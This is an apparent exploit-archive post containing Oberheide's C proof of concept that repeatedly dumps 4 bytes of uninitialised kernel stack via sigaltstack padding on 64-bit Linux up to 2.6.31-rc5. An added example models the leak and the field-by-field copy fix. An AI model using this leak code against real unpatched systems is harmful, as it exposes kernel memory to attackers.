Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure Exploit
Source: http://jon.oberheide.org  Author: Oberheide  Published: 2009-08-05

/*
 * sigaltstack-leak.c
 *
 * Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 *
 * Information:
 *
 *   http://git.kernel.org/linus/0083fc2c50e6c5127c2802ad323adf8143ab7856
 *
 *   Ulrich Drepper correctly points out that there is generally padding in
 *   the structure on 64-bit hosts, and that copying the structure from
 *   kernel to user space can leak information from the kernel stack in those
 *   padding bytes.
 *
 * Notes:
 *
 *   Only 4 bytes of uninitialized kernel stack are leaked in the padding
 *   between stack_t's ss_flags and ss_size.  The disclosure only affects
 *   64-bit hosts.
 */

#include <stdio.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <time.h>
#include <sys/syscall.h>
#include <sys/types.h>

/* x86-64 syscall numbers invoked at random between calls so that the
 * kernel stack holds varying data before each sigaltstack() */
const int randcalls[] = {
    0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 13, 14, 16,
    21, 22, 24, 25, 32, 33, 36, 37, 38, 39, 72, 73,
    78, 79, 96, 97, 97, 102, 104, 105, 106, 107, 108,
    109, 110, 11, 112, 113, 114, 116, 117, 118, 119,
    120, 121, 121, 123, 124, 125, 140, 141, 143, 146
};

/* Hex-dump the raw stack_t; bytes 12..15 (the padding hole between
 * ss_flags and ss_size on a 24-byte stack_t) are bracketed with *** */
void
dump(const unsigned char *p, unsigned l)
{
    printf("stack_t:");
    while (l > 0) {
        printf(" ");
        if (l == 12) {
            printf("*** ");
        }
        printf("%02x", *p);
        if (l == 9) {
            printf(" ***");
        }
        ++p; --l;
    }
    printf("\n");
}

int
main(void)
{
    char *p;
    int call, ret;
    size_t size, ftest, stest;
    stack_t oss;

    size = sizeof(stack_t);

    printf("[+] Checking platform...\n");

    /* 8-byte ss_sp + 4-byte ss_flags + 4 bytes padding + 8-byte ss_size */
    if (size == 24) {
        printf("[+] sizeof(stack_t) = %zu\n", size);
        printf("[+] Correct size, 64-bit platform.\n");
    } else {
        printf("[-] sizeof(stack_t) = %zu\n", size);
        printf("[-] Error: you do not appear to be on a 64-bit platform.\n");
        printf("[-] No information disclosure is possible.\n");
        exit(1);
    }

    /* end of ss_flags vs. start of ss_size: any gap is the padding hole */
    ftest = offsetof(stack_t, ss_flags) + sizeof(oss.ss_flags);
    stest = offsetof(stack_t, ss_size);

    printf("[+] Checking for stack_t hole...\n");

    if (ftest != stest) {
        printf("[+] ss_flags end (%zu) != ss_size start (%zu)\n", ftest, stest);
        printf("[+] Hole in stack_t present!\n");
    } else {
        printf("[-] ss_flags end (%zu) == ss_size start (%zu)\n", ftest, stest);
        printf("[-] Error: No hole in stack_t, something is quite wrong.\n");
        exit(1);
    }

    printf("[+] Ready to call sigaltstack.\n\n");

    for (ret = 5; ret > 0; ret--) {
        printf("%d...\n", ret);
        sleep(1);
    }
    srand(time(NULL));

    while (1) {
        /* random stuff to make stack pseudo-interesting */
        call = rand() % (sizeof(randcalls) / sizeof(int));
        syscall(randcalls[call]);

        /* query the current alternate stack; the kernel fills oss on its
         * own stack and copies the whole struct, padding included, back */
        ret = sigaltstack(NULL, &oss);
        if (ret != 0) {
            printf("[-] Error: sigaltstack failed.\n");
            exit(1);
        }

        dump((unsigned char *) &oss, sizeof(oss));
    }

    return 0;
}
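Added example, not part of the original post or of Oberheide's code: a user-space model of the padding leak described above and of the mitigation the referenced commit takes (copying the named fields individually instead of the whole structure). It assumes a constructed struct `alt_stack` with the same field order as the x86-64 `stack_t` (pointer, int, size_t), a constructed 0xAA marker standing in for stale kernel stack bytes, and `memcpy` in place of the kernel's copy to user space; the function and type names are mine. `copy_out_whole` reproduces the pre-fix whole-struct copy and carries the 4 padding bytes across; `copy_out_fields` copies only the named fields, so nothing from the hole leaves the frame. On a 32-bit build the hole has zero width and both paths report no leak, matching the note above.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for stack_t on x86-64: a pointer, an int and a size_t.
 * On LP64 targets the int is followed by 4 bytes of padding so that ss_size
 * is 8-byte aligned; on ILP32 targets there is no padding. */
struct alt_stack {
    void  *ss_sp;
    int    ss_flags;
    size_t ss_size;
};

/* Layout helpers: where the padding hole starts and how wide it is. */
size_t hole_offset(void)
{
    return offsetof(struct alt_stack, ss_flags) + sizeof(int);
}

size_t hole_size(void)
{
    return offsetof(struct alt_stack, ss_size) - hole_offset();
}

/* Models the kernel-side object: a stack frame whose bytes held something
 * before the struct was built in it.  The union guarantees alignment. */
union frame {
    struct alt_stack s;
    unsigned char    raw[sizeof(struct alt_stack)];
};

#define STALE 0xAA  /* constructed marker standing in for leftover kernel data */

/* Build the struct field by field on top of stale memory, leaving the padding
 * bytes untouched, which is the situation the pre-fix kernel was in. */
static void build_on_stale_frame(union frame *f, void *sp, int flags, size_t size)
{
    memset(f->raw, STALE, sizeof f->raw);
    memcpy(f->raw + offsetof(struct alt_stack, ss_sp),    &sp,    sizeof sp);
    memcpy(f->raw + offsetof(struct alt_stack, ss_flags), &flags, sizeof flags);
    memcpy(f->raw + offsetof(struct alt_stack, ss_size),  &size,  sizeof size);
}

/* Vulnerable pattern: copy the whole object, padding included. */
void copy_out_whole(unsigned char *user, const union frame *f)
{
    memcpy(user, f->raw, sizeof f->raw);
}

/* Fixed pattern (the approach the referenced commit describes): copy only the
 * named fields, so the kernel's padding bytes never reach user memory. */
void copy_out_fields(unsigned char *user, const union frame *f)
{
    memcpy(user + offsetof(struct alt_stack, ss_sp),    &f->s.ss_sp,    sizeof f->s.ss_sp);
    memcpy(user + offsetof(struct alt_stack, ss_flags), &f->s.ss_flags, sizeof f->s.ss_flags);
    memcpy(user + offsetof(struct alt_stack, ss_size),  &f->s.ss_size,  sizeof f->s.ss_size);
}

/* Number of padding bytes in the user copy that carry the stale marker. */
size_t leaked_bytes(const unsigned char *user)
{
    size_t n = 0;
    for (size_t i = hole_offset(); i < hole_offset() + hole_size(); i++)
        if (user[i] == STALE)
            n++;
    return n;
}

/* Run one scenario; returns how many stale kernel bytes reached user space. */
size_t simulate(int use_fixed_copy)
{
    union frame kernel;
    unsigned char user[sizeof(struct alt_stack)];

    build_on_stale_frame(&kernel, NULL, 0, 8192);
    memset(user, 0, sizeof user);            /* user buffer starts clean */
    if (use_fixed_copy)
        copy_out_fields(user, &kernel);
    else
        copy_out_whole(user, &kernel);
    return leaked_bytes(user);
}

int main(void)
{
    printf("padding hole: offset %zu, %zu bytes\n", hole_offset(), hole_size());
    printf("whole-struct copy leaks %zu byte(s)\n", simulate(0));
    printf("field-by-field copy leaks %zu byte(s)\n", simulate(1));
    return 0;
}
```

The same check generalises to any struct handed back to a less trusted domain: compute the gap between the end of each field and the start of the next, and treat any non-zero gap as bytes that must either be zeroed before the copy or excluded from it. The field-by-field copy is preferred over a `memset` when the destination is user memory, because it also leaves the caller's own padding bytes untouched.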
